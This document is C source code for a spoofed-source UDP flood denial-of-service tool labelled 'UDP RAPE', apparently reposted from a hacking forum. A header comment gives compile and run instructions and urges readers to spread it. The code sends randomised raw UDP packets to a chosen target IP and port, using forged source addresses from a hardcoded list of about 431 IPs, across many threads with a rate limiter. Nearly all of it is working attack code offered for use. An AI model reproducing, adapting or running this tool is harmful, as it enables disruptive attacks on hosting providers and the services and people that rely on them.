OVH UDP RAPE source

1. /*
2.        original post : https://hackforums.net/showthread.php?tid=6067231
3.  ***Reminder*** recode this Clay Davis in cpp
4. Since our servers at NFO and OVH keep getting attacked by this certain script by some dumbfuck using an expensive stresser plan, and OVH/NFO don't seem to be interested in patching it after 3 weeks of appealing after sending the source over to them, I decided to release it here as it gets annoying even when we can block 50% of it with OVH IP firewall.
5.  
6. Why release it here if im under attack by the said script? Cause I know it will get abused to the max for a short time, and then quickly patched by various providers.
7.  
8. This is the same script found in 3 high profile stressers/panels as "UDP RAPE" or "OVH RAPE" method.
9.  
10. The shorter time this is patched the better for me, so go ahead and spread it everywhere.
11.  
12. Its compiled with: gcc [filename] -pthread -o [binaryfilename]
13. (you might need to add special args such as c98 to the above compile line if it shows errors)
14. and run as root with ./[binaryfilename]
15. example: ./udprape <target IP> <port> <packet_size> <number threads to use (CPU cores)> <pps limiter, -1 for no limit> <time in seconds>
16. NOTE: You need a spoofed server for this.
17.  
18. */
19.  
20. #include <pthread.h>
21. #include <unistd.h>
22. #include <stdio.h>
23. #include <stdlib.h>
24. #include <string.h>
25. #include <sys/socket.h>
26. #include <netinet/ip.h>
27. #include <netinet/udp.h>
28. #include <arpa/inet.h>
29.  
30. #define MAX_PACKET_SIZE 4096
31. #define PHI 0xaaf219b9
32.  
33. static unsigned long int Q[4096], c = 362436;
34. static unsigned int floodport;
35. volatile int limiter;
36. volatile unsigned int pps;
37. volatile unsigned int sleeptime = 100;
38.  
39. //v5
40. int packet_size;
41.  
42.  
43. void print_ip(int ip)
44. {
45.     unsigned char bytes[4];
46.     bytes[0] = ip & 0xFF;
47.     bytes[1] = (ip >> 8) & 0xFF;
48.     bytes[2] = (ip >> 16) & 0xFF;
49.     bytes[3] = (ip >> 24) & 0xFF;
50.     printf("%d.%d.%d.%d\n", bytes[3], bytes[2], bytes[1], bytes[0]);
51. }
52. //
53. void init_rand(unsigned long int x)
54. {
55.         int i;
56.         Q[0] = x;
57.         Q[1] = x + PHI;
58.         Q[2] = x + PHI + PHI;
59.         for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
60. }
61.  
62. unsigned long int rand_cmwc(void)
63. {
64.         unsigned long long int t, a = 18782LL;
65.         static unsigned long int i = 4095;
66.         unsigned long int x, r = 0xfffffffe;
67.         i = (i + 1) & 4095;
68.         t = a * Q[i] + c;
69.         c = (t >> 32);
70.         x = t + c;
71.         if (x < c) {
72.                 x++;
73.                 c++;
74.         }
75.         return (Q[i] = r - x);
76. }
77.  
78.  
79. unsigned short csum (unsigned short *buf, int count)
80. {
81.         register unsigned long sum = 0;
82.         while( count > 1 ) { sum += *buf++; count -= 2; }
83.         if(count > 0) { sum += *(unsigned char *)buf; }
84.         while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
85.         return (unsigned short)(~sum);
86. }
87.  
88. int randnum(int min_num, int max_num)
89. {
90.     int result = 0, low_num = 0, hi_num = 0;
91.  
92.     if (min_num < max_num)
93.     {
94.         low_num = min_num;
95.         hi_num = max_num + 1; // include max_num in output
96.     } else {
97.         low_num = max_num + 1; // include max_num in output
98.         hi_num = min_num;
99.     }
100.  
101. //    srand(time(NULL)); we already have it initialized in init_rand, also OVH is a bitch and they recognize random numbers generated by time
102.     result = (rand_cmwc() % (hi_num - low_num)) + low_num;
103.     return result;
104. }
105.  
106. void setup_ip_header(struct iphdr *iph)
107. {
108.         iph->ihl = 5;
109.         iph->version = 4;
110.         iph->tos = 0;
111.         iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 4;
112.         iph->id = htonl(54321);
113.         iph->frag_off = 0;
114.         iph->ttl = 128;
115.         iph->protocol = IPPROTO_UDP;
116.         iph->check = 0;
117. }
118.  
119. void setup_udp_header(struct udphdr *udph)
120. {
121.     udph->source = htons(50000 + rand_cmwc() % 65535);
122.     udph->dest = htons(floodport);
123.     udph->check = 0;
124.     memcpy((void *)udph + sizeof(struct udphdr), "\x08\x1e\x77\xda", 4);
125.     udph->len=htons(sizeof(struct udphdr) + 4);
126. }
127.  
128. void *flood(void *par1)
129. {
130.         char *td = (char *)par1;
131.         char datagram[MAX_PACKET_SIZE];
132.         struct iphdr *iph = (struct iphdr *)datagram;
133.         struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
134.  
135.         struct sockaddr_in sin;
136.         sin.sin_family = AF_INET;
137.         sin.sin_port = htons(17015);
138.         sin.sin_addr.s_addr = inet_addr(td);
139.  
140.         int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
141.         if(s < 0){
142.                 fprintf(stderr, "Could not open raw socket.\n");
143.                 exit(-1);
144.         }
145.         memset(datagram, 0, MAX_PACKET_SIZE);
146.         setup_ip_header(iph);
147.         setup_udp_header(udph);
148.  
149.  
150.         iph->daddr = sin.sin_addr.s_addr;
151.         iph->check = csum ((unsigned short *) datagram, iph->tot_len);
152.  
153.        
154.         int sport[packet_size];
155.         unsigned char payload1[packet_size];
156.        
157.         for(int i = 0; i <= packet_size; i++){
158.                 //print_ip(fakeclients[i]); if we debug we use this
159.                 sport[i] = htons(randnum(55000,64932));
160.                 payload1[i] = rand_cmwc();
161.         }
162.  
163.         int tmp = 1;
164.         const int *val = &tmp;
165.         if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
166.                 fprintf(stderr, "_error_: setsockopt() - Cannot set HDRINCL!\n");
167.                 exit(-1);
168.         }
169.                 init_rand(time(NULL));
170.         register unsigned int i;
171.         i = 0;
172.  
173.         int packet_lenght = 0;
174.        
175.         int fake_id = 0;
176.        
177.                 //This is Clay Davis
178.         int class[]= {2372231209,2728286747,1572769288,3339925505,2372233279,3254787125,1160024353,2328478311,3266388596,3238005002,1745910789,3455829265,1822614803,3355015169,3389792053,757144879,2734605396,1230980369,3639549962,2728310654,3256452616,3561573700,2918529833,2890221130,2918997764,2453837834,3369835018,3256452681,3007103780,1137178634,3264375402,3229415686,2728310653,3627732067,2890220626,1137178635,3391077889,1745910533,1755074592,16843009,1092011777,3223532318,2918529914,621985916,2728287341,1191626519,2890184316,1822618132,1168895755,3639551498,3455827995,3338431589,3222035998,1731284993,1540078376,3423468322,3254790913,2372224268,2372233305,1822611509,3639550986,2918529633,2890217035,2728286295,2728310634,1488976481,3372614717,3224391454,3223389196,2728329505,1760832002,879920151,3328983856,2728310645,2627363865,2372224322,1499753002,1386562582,875052612,3426605106,2890251825,2728286223,2728310638,2328478534,1822614881,879919113,846476877,3390912871,3238005001,2734604550,1746152824,1539838052,1475895815,1123085431,3639550485,3397779518,3254783489,3223277598,3236292914,2728329249,249627429,1745909765,3339148045,2890217051,1822614887,1746125597,1358538789,839341370,3732673086,3238005000,3221554718,3187841866,2918529910,2542501898,2372224274,1509469200,1121752324,3588504106,3281714501,2372231173,2354214403,1877438500,1746504997,1572678189,1386570514,1123631710,778390842,3562249811,3357634306,3355320065,3352559669,2918529846,2734605379,2728310629,2728292211,2627370561,1822618129,1121752339,879905324,864886835,401541676,3368085770,3281689978,3105469954,2734605380,2637637498,1746667045,1607997226,3226633758,2918529919,2918529639,2890216975,2734605608,2728310642,2627354890,2372224304,2372233499,1482909190,3475901778,3324575748,3221554177,3184129025,2890154342,2728303398,2673421074,2297665372,879919114,3627732078,3639551509,3423468304,3413598005,3355013121,3118228756,2890217308,2890217011,2728310650,2728292214,2627370049,2609248308,2061767504,401285152,3639550474,3544957520,3455828543,3221245464,3187838794,3118228793,2918529872,2609248268,225126924,1566231927,1559430661,1347043330,879905826,3367840010,3108454677,2745962606,2734604397,2734604388,2372226080,1541444905,763183627,3355643150,3234588170,2890217320,2372226403,2328477289,1746667301,1019160141,3455829021,3451508746,3352559679,3223953950,3036312413,2915649581,2728286231,2728295989,2609248267,1746883363,3495166517,3495166005,2728329546,2372226339,2354214404,225179146,1746651228,1755075616,1158721290,1123631699,757107306,3627734829,3588504105,3513807393,3372614671,3234222083,2918529587,2328472852,1822614857,1746651484,1729902934,16777217,1347570977,1249741850,401286176,3451508778,3339924993,3267263505,2890220602,2890217232,2734605610,2734604590,2627354634,2372233317,2061767503,3370514442,3224001822,3223391774,2890153573,2728286564,2609248309,2372231206,1746669130,1746505581,1746018670,1540324867,1490426385,3627734819,3571472426,3389791009,3339754505,3238004997,3224678942,3105432334,2918529646,2501132291,2372226408,2372233487,2372233333,1746505837,2916403734,2890153763,2609247813,2372231196,1822614893,1122525959,879894536,610792735,3588503850,3494790672,3350508607,3302533386,1572396061,1046910020,1039029042,778432376,679348486,3281684007,2728310635,2319739454,225126923,1822614869,1822614791,1390242054,1185293895,3629619233,3639549973,3356113973,3258558721,3224793118,3113151523,2918529907,2734605395,2728310655,1746669386,2734604591,2728310636,1760832065,1539137028,2728329756,2372231208,2372224328,879905323,675544612,634503170,3494653237,3162044975,3113716993,2919228438,2728310575,1054006394,3339146026,3339925761,3224087582,2328461595,225117528,1746152568,1092011009,879894535,97447234,3251539246,3223622673,3118228768,2728310632,2372233584,3627734830,3355643147,3339142145,3228574724,3221245453,2890152495,2734604396,2728310647,1822617914,1822612837,1494642712,3562246432,3238004993,3109164125,2745964819,2372231174,2264919306,1822617962,3647724345,3328294453,3224851230,3221245452,2728310599,2673449270,2609248307,2540009556,2372226378,1998378804,1745910021,879905827,676177781,3629620001,3254789121,3118786598,3113151522,2918529642,2728282915,1822617878,1746018414,1123077410,401541708,3339924737,2453837835,2151612981,1347928371,1249741851,2728286267,2734604551,2728286303,2372226052,3390923303,2734604389,1877351697,1475895816,2372231186,3663327556,3221245216,3639550997,3413595749,3252515125,2609247812,2372231207,2372226334,1746373394,3350509109,2372231195,3562380810,2918997773,3323221858,2918529663,2016704517,1475395139,1123631109,3238004999,1389915980,95573855,3238004998,3221245186,3118228769,3118228770,3225059358,3256452680,1779203355,1746883107,1760832066,1585621764,3222952990,3627734826};
179.        
180.         while(1){
181.  
182.                 iph->saddr = htonl(class[rand_cmwc()%431]);
183.                 udph->source = htons(sport[randnum(0,packet_size)]);
184.                
185.                 packet_lenght = randnum(500, packet_size);
186.                 int fake_id = rand_cmwc() & 0xFFFFFFFF;
187.                 iph->id = htonl(fake_id);
188.                
189.                 memcpy((void *)udph + sizeof(struct udphdr), payload1, packet_lenght);
190.                 udph->len=htons(sizeof(struct udphdr) + packet_lenght);
191.                
192.                 iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + packet_lenght;
193.                 iph->check = csum ((unsigned short *) datagram, iph->tot_len);
194.  
195.                 sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
196.  
197.                 pps++;
198.                 if(i >= limiter)
199.                 {
200.                         i = 0;
201.                         usleep(sleeptime);
202.                 }
203.                 i++;
204.         }
205. }
206. int main(int argc, char *argv[ ])
207. {
208.         if(argc < 5){
209.                 fprintf(stderr, "Invalid parameters!\n");
210.                 fprintf(stdout, "Usage: %s <target IP> <port> <packet_size> <number threads to use> <pps limiter, -1 for no limit> <time> \n", argv[0]);
211.                 fprintf(stderr, "Telegram: @SLAVICD\n");
212.                 exit(-1);
213.         }
214.  
215.         fprintf(stdout, "Setting up Sockets...\n");
216.  
217.         int num_threads = atoi(argv[4]);
218.         int maxpps = atoi(argv[5]);
219.        
220.         floodport = atoi(argv[2]);
221.         packet_size = atoi(argv[3]);
222.  
223.         limiter = 0;
224.         pps = 0;
225.         pthread_t thread[num_threads];
226.  
227.         int multiplier = 20;
228.  
229.         int i;
230.         for(i = 0;i<num_threads;i++){
231.                 pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
232.         }
233.         fprintf(stdout, "Starting Flood...\n");
234.         for(i = 0;i<(atoi(argv[6])*multiplier);i++)
235.         {
236.                 usleep((1000/multiplier)*1000);
237.                 if((pps*multiplier) > maxpps)
238.                 {
239.                         if(1 > limiter)
240.                         {
241.                                 sleeptime+=100;
242.                         } else {
243.                                 limiter--;
244.                         }
245.                 } else {
246.                         limiter++;
247.                         if(sleeptime > 25)
248.                         {
249.                                 sleeptime-=25;
250.                         } else {
251.                                 sleeptime = 0;
252.                         }
253.                 }
254.                 pps = 0;
255.         }
256.  
257.         return 0;
258. }